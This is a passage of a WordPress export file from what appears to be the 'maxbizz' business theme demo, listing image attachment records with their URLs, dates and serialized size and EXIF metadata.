s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>image2-home1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/image2-home1/</link>
		<pubDate>Tue, 29 Dec 2020 07:16:52 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/image2-home1.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1967</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 07:16:52]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 07:16:52]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[image2-home1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/image2-home1.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/image2-home1.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:750;s:6:"height";i:660;s:4:"file";s:24:"2020/12/image2-home1.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:24:"image2-home1-300x264.jpg";s:5:"width";i:300;s:6:"height";i:264;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"image2-home1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"image2-home1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"image2-home1-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:24:"image2-home1-750x600.jpg";s:5:"width";i:750;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg3-value</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/bg3-value/</link>
		<pubDate>Tue, 29 Dec 2020 07:18:19 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg3-value.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1971</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 07:18:19]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 07:18:19]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg3-value]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg3-value.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/bg3-value.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:692;s:4:"file";s:21:"2020/12/bg3-value.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:21:"bg3-value-300x108.jpg";s:5:"width";i:300;s:6:"height";i:108;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"bg3-value-1024x369.jpg";s:5:"width";i:1024;s:6:"height";i:369;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"bg3-value-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"bg3-value-768x277.jpg";s:5:"width";i:768;s:6:"height";i:277;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:22:"bg3-value-1536x554.jpg";s:5:"width";i:1536;s:6:"height";i:554;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"bg3-value-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"bg3-value-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:22:"bg3-value-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:22:"bg3-value-1200x692.jpg";s:5:"width";i:1200;s:6:"height";i:692;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg1-value</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/bg1-value/</link>
		<pubDate>Tue, 29 Dec 2020 07:22:12 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg1-value.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1979</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 07:22:12]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 07:22:12]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bg1-value]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bg1-value.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/bg1-value.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:408;s:4:"file";s:21:"2020/12/bg1-value.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:20:"bg1-value-300x64.jpg";s:5:"width";i:300;s:6:"height";i:64;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"bg1-value-1024x218.jpg";s:5:"width";i:1024;s:6:"height";i:218;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"bg1-value-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"bg1-value-768x163.jpg";s:5:"width";i:768;s:6:"height";i:163;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:22:"bg1-value-1536x326.jpg";s:5:"width";i:1536;s:6:"height";i:326;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"bg1-value-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"bg1-value-600x408.jpg";s:5:"width";i:600;s:6:"height";i:408;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:22:"bg1-value-1200x408.jpg";s:5:"width";i:1200;s:6:"height";i:408;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:22:"bg1-value-1200x408.jpg";s:5:"width";i:1200;s:6:"height";i:408;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>service-box1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/service-box1/</link>
		<pubDate>Tue, 29 Dec 2020 07:27:49 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/service-box1.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1986</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 07:27:49]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 07:27:49]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[service-box1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/service-box1.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/service-box1.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:576;s:4:"file";s:24:"2020/12/service-box1.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:24:"service-box1-300x199.jpg";s:5:"width";i:300;s:6:"height";i:199;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"service-box1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"service-box1-768x508.jpg";s:5:"width";i:768;s:6:"height";i:508;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"service-box1-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"service-box1-600x576.jpg";s:5:"width";i:600;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>service-box2</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/service-box2/</link>
		<pubDate>Tue, 29 Dec 2020 07:27:51 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/service-box2.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1987</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 07:27:51]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 07:27:51]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[service-box2]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/service-box2.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/service-box2.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:576;s:4:"file";s:24:"2020/12/service-box2.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:24:"service-box2-300x199.jpg";s:5:"width";i:300;s:6:"height";i:199;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"service-box2-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"service-box2-768x508.jpg";s:5:"width";i:768;s:6:"height";i:508;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"service-box2-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"service-box2-600x576.jpg";s:5:"width";i:600;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>service-box3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/service-box3/</link>
		<pubDate>Tue, 29 Dec 2020 07:27:52 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/service-box3.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1988</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 07:27:52]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 07:27:52]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[service-box3]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/service-box3.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/service-box3.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:576;s:4:"file";s:24:"2020/12/service-box3.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:24:"service-box3-300x199.jpg";s:5:"width";i:300;s:6:"height";i:199;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"service-box3-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"service-box3-768x508.jpg";s:5:"width";i:768;s:6:"height";i:508;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"service-box3-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"service-box3-600x576.jpg";s:5:"width";i:600;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>service-box4</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/service-box4/</link>
		<pubDate>Tue, 29 Dec 2020 07:27:54 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/service-box4.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1989</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 07:27:54]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 07:27:54]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[service-box4]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/service-box4.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/service-box4.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:576;s:4:"file";s:24:"2020/12/service-box4.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:24:"service-box4-300x199.jpg";s:5:"width";i:300;s:6:"height";i:199;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"service-box4-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"service-box4-768x508.jpg";s:5:"width";i:768;s:6:"height";i:508;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"service-box4-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"service-box4-600x576.jpg";s:5:"width";i:600;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>service-box5</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/service-box5/</link>
		<pubDate>Tue, 29 Dec 2020 07:27:55 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/service-box5.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1990</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 07:27:55]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 07:27:55]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[service-box5]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/service-box5.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/service-box5.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:576;s:4:"file";s:24:"2020/12/service-box5.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:24:"service-box5-300x199.jpg";s:5:"width";i:300;s:6:"height";i:199;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"service-box5-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"service-box5-768x508.jpg";s:5:"width";i:768;s:6:"height";i:508;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"service-box5-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"service-box5-600x576.jpg";s:5:"width";i:600;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>service-box6</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/service-box6/</link>
		<pubDate>Tue, 29 Dec 2020 07:27:57 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/service-box6.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1991</wp:post_id>
		<wp:post_date><![CDATA[2020-12-29 07:27:57]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-29 07:27:57]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[service-box6]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/service-box6.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/service-box6.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:576;s:4:"file";s:24:"2020/12/service-box6.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:24:"service-box6-300x199.jpg";s:5:"width";i:300;s:6:"height";i:199;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:24:"service-box6-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:24:"service-box6-768x508.jpg";s:5:"width";i:768;s:6:"height";i:508;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:24:"service-box6-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:24:"service-box6-600x576.jpg";s:5:"width";i:600;s:6:"height";i:576;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bg1-service-grid</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/bg1-service-grid/</link>
		<pubDate>Tue, 29 Dec 2020 07:30:04 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bg1-service-grid.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1993</wp:post_id>
